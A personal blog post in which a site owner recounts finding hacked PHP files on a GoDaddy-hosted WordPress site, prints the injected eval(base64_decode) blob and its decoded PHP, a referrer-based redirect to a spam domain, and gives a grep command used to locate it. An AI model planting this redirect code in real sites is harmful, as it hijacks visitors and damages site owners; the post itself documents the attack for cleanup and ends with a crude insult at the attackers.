So today, I noticed my another hack that’s been installed on my machine. I have to say ever since my move to GoDaddy.com, my site has been hacked over and over again. This is number #3. The reason why I posted about this one is because it is actually pretty interesting and finding what was done was like a mystery. So let me tell you a quick story.
So this evening I was trying to figure out how to get my project 365 page to post automatically to my website. This is when I first noticed a slowdown and issue when I am using the debugger from Facebook. At first I thought it was the wordpress plug in, but it occasionally works. I got everything ready, and posted my first auto post and strange things started to happen.
As I stated, everything looked normal at first until I click on the links provided by Facebook. When I click on the Facebook link to my website, it goes to some spam site. At first I thought it was the .htaccess hack that was I received a while back, but that is not the case. Then I thought maybe it was a DNS hack. That was also not the case, finally, I found the following in all my .php files on my web server.
It uses eval command and nested with base64_decode the following block of code.
DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhl
YWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVS
RVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICgh
c3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Ig
c3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0
cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJp
c3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBz
dHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQu
bHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5k
ZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgi
L2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlz
cGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRy
ZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3Ry
aXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbWlua29mLnNl
bGxjbGFzc2ljcy5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ
it is quite clever. It is encoded and people may easily over look it, but when you decode the text this is what you get
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[‘HTTP_REFERER’];
$uag=$_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (!stristr($uag,”MSIE 7.0″)){
if (stristr($referer,”yahoo”) or stristr($referer,”bing”) or stristr($referer,”rambler”) or stristr($referer,”gogo”) or stristr($referer,”live.com”)or stristr($referer,”aport”) or stristr($referer,”nigma”) or stristr($referer,”webalta”) or stristr($referer,”begun.ru”) or stristr($referer,”stumbleupon.com”) or stristr($referer,”bit.ly”) or stristr($referer,”tinyurl.com”) or preg_match(“/yandex\.ru\/yandsearch\?(.*?)\&lr\=/”,$referer) or preg_match (“/google\.(.*?)\/url\?sa/”,$referer) or stristr($referer,”myspace.com”) or stristr($referer,”facebook.com”) or stristr($referer,”aol.com”)) {
if (!stristr($referer,”cache”) or !stristr($referer,”inurl”)){
header(“Location: http://minkof.sellclassics.com/”);
exit();
}
}
}
}
}
Tricky huh?
So well… solution? remove all code in all .php files and with a little help from “grep” I was able to locate all the bad codes.
grep -H -r ‘eval(base64_decode’ ./
So, Go To Hell You Punk Hackers!!! I hope you guys get busted and become someone’s bitch in prison.